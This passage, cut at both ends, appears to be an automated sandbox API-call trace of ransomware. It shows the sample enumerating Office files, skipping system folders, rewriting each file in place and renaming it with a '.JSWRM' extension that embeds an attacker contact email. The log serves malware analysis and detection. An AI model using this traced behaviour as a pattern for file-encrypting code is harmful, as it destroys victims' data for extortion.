(lpString1="DGWEBPQT.DPV", lpString2="recovery") returned -1 [0141.263] lstrcmpiW (lpString1="DGWEBPQT.DPV", lpString2="perflogs") returned -1 [0141.263] lstrcmpiW (lpString1="DGWEBPQT.DPV", lpString2="documents and settings") returned -1 [0141.263] lstrcmpiW (lpString1="DGWEBPQT.DPV", lpString2="$RECYCLE.BIN") returned 1 [0141.263] lstrcmpiW (lpString1="DGWEBPQT.DPV", lpString2="system volume information") returned -1 [0141.263] lstrcmpiW (lpString1="DGWEBPQT.DPV", lpString2="msocache") returned -1 [0141.263] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBPQT.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.263] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBPQT.DPV", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGWEBPQT.DPV", lpUsedDefaultChar=0x0) returned 12 [0141.263] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBPQT.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.263] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBPQT.DPV", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGWEBPQT.DPV", lpUsedDefaultChar=0x0) returned 12 [0141.263] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.263] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.263] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGWEBPQT.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgwebpqt.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.264] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=20480) returned 1 [0141.264] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.264] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x5000, lpOverlapped=0x0) returned 1 [0141.267] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.267] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x5000, lpOverlapped=0x0) returned 1 [0141.267] CloseHandle (hObject=0x238) returned 1 [0141.268] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGWEBPQT.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgwebpqt.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGWEBPQT.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgwebpqt.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.269] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc7288ca, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc7288ca, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc7288ca, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xbbc, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGWEBPQT.XML", cAlternateFileName="")) returned 1 [0141.269] lstrcmpiW (lpString1="DGWEBPQT.XML", lpString2=".") returned 1 [0141.269] lstrcmpiW (lpString1="DGWEBPQT.XML", lpString2="..") returned 1 [0141.269] lstrcmpiW (lpString1="DGWEBPQT.XML", lpString2="...") returned 1 [0141.269] lstrcmpiW (lpString1="DGWEBPQT.XML", lpString2="windows") returned -1 [0141.269] lstrcmpiW (lpString1="DGWEBPQT.XML", lpString2="recovery") returned -1 [0141.269] lstrcmpiW (lpString1="DGWEBPQT.XML", lpString2="perflogs") returned -1 [0141.269] lstrcmpiW (lpString1="DGWEBPQT.XML", lpString2="documents and settings") returned -1 [0141.269] lstrcmpiW (lpString1="DGWEBPQT.XML", lpString2="$RECYCLE.BIN") returned 1 [0141.269] lstrcmpiW (lpString1="DGWEBPQT.XML", lpString2="system volume information") returned -1 [0141.269] lstrcmpiW (lpString1="DGWEBPQT.XML", lpString2="msocache") returned -1 [0141.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBPQT.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBPQT.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGWEBPQT.XML", lpUsedDefaultChar=0x0) returned 12 [0141.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBPQT.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBPQT.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGWEBPQT.XML", lpUsedDefaultChar=0x0) returned 12 [0141.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.269] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGWEBPQT.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgwebpqt.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.271] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3004) returned 1 [0141.271] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.271] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xbb0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xbb0, lpOverlapped=0x0) returned 1 [0141.273] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.273] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xbb0, lpOverlapped=0x0) returned 1 [0141.273] CloseHandle (hObject=0x238) returned 1 [0141.273] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGWEBPQT.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgwebpqt.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGWEBPQT.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgwebpqt.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.274] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc7288ca, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc7288ca, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc7288ca, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x220, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGWEBREF.XML", cAlternateFileName="")) returned 1 [0141.274] lstrcmpiW (lpString1="DGWEBREF.XML", lpString2=".") returned 1 [0141.274] lstrcmpiW (lpString1="DGWEBREF.XML", lpString2="..") returned 1 [0141.274] lstrcmpiW (lpString1="DGWEBREF.XML", lpString2="...") returned 1 [0141.274] lstrcmpiW (lpString1="DGWEBREF.XML", lpString2="windows") returned -1 [0141.274] lstrcmpiW (lpString1="DGWEBREF.XML", lpString2="recovery") returned -1 [0141.274] lstrcmpiW (lpString1="DGWEBREF.XML", lpString2="perflogs") returned -1 [0141.274] lstrcmpiW (lpString1="DGWEBREF.XML", lpString2="documents and settings") returned -1 [0141.274] lstrcmpiW (lpString1="DGWEBREF.XML", lpString2="$RECYCLE.BIN") returned 1 [0141.274] lstrcmpiW (lpString1="DGWEBREF.XML", lpString2="system volume information") returned -1 [0141.275] lstrcmpiW (lpString1="DGWEBREF.XML", lpString2="msocache") returned -1 [0141.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBREF.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBREF.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGWEBREF.XML", lpUsedDefaultChar=0x0) returned 12 [0141.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBREF.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBREF.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGWEBREF.XML", lpUsedDefaultChar=0x0) returned 12 [0141.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.275] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGWEBREF.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgwebref.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.275] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=544) returned 1 [0141.276] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.276] ReadFile (in: hFile=0x238, lpBuffer=0x209950, nNumberOfBytesToRead=0x220, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x209950*, lpNumberOfBytesRead=0x345e89c*=0x220, lpOverlapped=0x0) returned 1 [0141.277] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.277] WriteFile (in: hFile=0x238, lpBuffer=0x209950*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x209950*, lpNumberOfBytesWritten=0x345e898*=0x220, lpOverlapped=0x0) returned 1 [0141.277] CloseHandle (hObject=0x238) returned 1 [0141.277] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGWEBREF.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgwebref.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGWEBREF.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgwebref.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.278] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21a53b55, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21a53b55, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21a79da4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6df7, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGWEBSBR.DPV", cAlternateFileName="")) returned 1 [0141.278] lstrcmpiW (lpString1="DGWEBSBR.DPV", lpString2=".") returned 1 [0141.278] lstrcmpiW (lpString1="DGWEBSBR.DPV", lpString2="..") returned 1 [0141.278] lstrcmpiW (lpString1="DGWEBSBR.DPV", lpString2="...") returned 1 [0141.278] lstrcmpiW (lpString1="DGWEBSBR.DPV", lpString2="windows") returned -1 [0141.279] lstrcmpiW (lpString1="DGWEBSBR.DPV", lpString2="recovery") returned -1 [0141.279] lstrcmpiW (lpString1="DGWEBSBR.DPV", lpString2="perflogs") returned -1 [0141.279] lstrcmpiW (lpString1="DGWEBSBR.DPV", lpString2="documents and settings") returned -1 [0141.279] lstrcmpiW (lpString1="DGWEBSBR.DPV", lpString2="$RECYCLE.BIN") returned 1 [0141.279] lstrcmpiW (lpString1="DGWEBSBR.DPV", lpString2="system volume information") returned -1 [0141.279] lstrcmpiW (lpString1="DGWEBSBR.DPV", lpString2="msocache") returned -1 [0141.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBSBR.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBSBR.DPV", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGWEBSBR.DPV", lpUsedDefaultChar=0x0) returned 12 [0141.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBSBR.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBSBR.DPV", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGWEBSBR.DPV", lpUsedDefaultChar=0x0) returned 12 [0141.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.279] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGWEBSBR.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgwebsbr.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.280] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=28151) returned 1 [0141.280] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.280] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x6df0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x6df0, lpOverlapped=0x0) returned 1 [0141.289] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.289] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x6df0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x6df0, lpOverlapped=0x0) returned 1 [0141.289] CloseHandle (hObject=0x238) returned 1 [0141.290] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGWEBSBR.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgwebsbr.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGWEBSBR.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgwebsbr.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.291] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc74eab3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc74eab3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc74eab3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xbbc, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGWEBSBR.XML", cAlternateFileName="")) returned 1 [0141.291] lstrcmpiW (lpString1="DGWEBSBR.XML", lpString2=".") returned 1 [0141.291] lstrcmpiW (lpString1="DGWEBSBR.XML", lpString2="..") returned 1 [0141.291] lstrcmpiW (lpString1="DGWEBSBR.XML", lpString2="...") returned 1 [0141.291] lstrcmpiW (lpString1="DGWEBSBR.XML", lpString2="windows") returned -1 [0141.291] lstrcmpiW (lpString1="DGWEBSBR.XML", lpString2="recovery") returned -1 [0141.291] lstrcmpiW (lpString1="DGWEBSBR.XML", lpString2="perflogs") returned -1 [0141.291] lstrcmpiW (lpString1="DGWEBSBR.XML", lpString2="documents and settings") returned -1 [0141.291] lstrcmpiW (lpString1="DGWEBSBR.XML", lpString2="$RECYCLE.BIN") returned 1 [0141.291] lstrcmpiW (lpString1="DGWEBSBR.XML", lpString2="system volume information") returned -1 [0141.291] lstrcmpiW (lpString1="DGWEBSBR.XML", lpString2="msocache") returned -1 [0141.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBSBR.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBSBR.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGWEBSBR.XML", lpUsedDefaultChar=0x0) returned 12 [0141.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBSBR.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBSBR.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGWEBSBR.XML", lpUsedDefaultChar=0x0) returned 12 [0141.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.291] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGWEBSBR.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgwebsbr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.293] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3004) returned 1 [0141.293] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.293] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xbb0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xbb0, lpOverlapped=0x0) returned 1 [0141.294] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.294] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xbb0, lpOverlapped=0x0) returned 1 [0141.295] CloseHandle (hObject=0x238) returned 1 [0141.295] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGWEBSBR.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgwebsbr.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGWEBSBR.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgwebsbr.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.296] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21a53b55, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21a53b55, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21a79da4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGZIP.DPV", cAlternateFileName="")) returned 1 [0141.296] lstrcmpiW (lpString1="DGZIP.DPV", lpString2=".") returned 1 [0141.296] lstrcmpiW (lpString1="DGZIP.DPV", lpString2="..") returned 1 [0141.296] lstrcmpiW (lpString1="DGZIP.DPV", lpString2="...") returned 1 [0141.296] lstrcmpiW (lpString1="DGZIP.DPV", lpString2="windows") returned -1 [0141.296] lstrcmpiW (lpString1="DGZIP.DPV", lpString2="recovery") returned -1 [0141.296] lstrcmpiW (lpString1="DGZIP.DPV", lpString2="perflogs") returned -1 [0141.296] lstrcmpiW (lpString1="DGZIP.DPV", lpString2="documents and settings") returned -1 [0141.296] lstrcmpiW (lpString1="DGZIP.DPV", lpString2="$RECYCLE.BIN") returned 1 [0141.296] lstrcmpiW (lpString1="DGZIP.DPV", lpString2="system volume information") returned -1 [0141.296] lstrcmpiW (lpString1="DGZIP.DPV", lpString2="msocache") returned -1 [0141.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGZIP.DPV", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0141.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGZIP.DPV", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGZIP.DPV", lpUsedDefaultChar=0x0) returned 9 [0141.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGZIP.DPV", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0141.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGZIP.DPV", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, 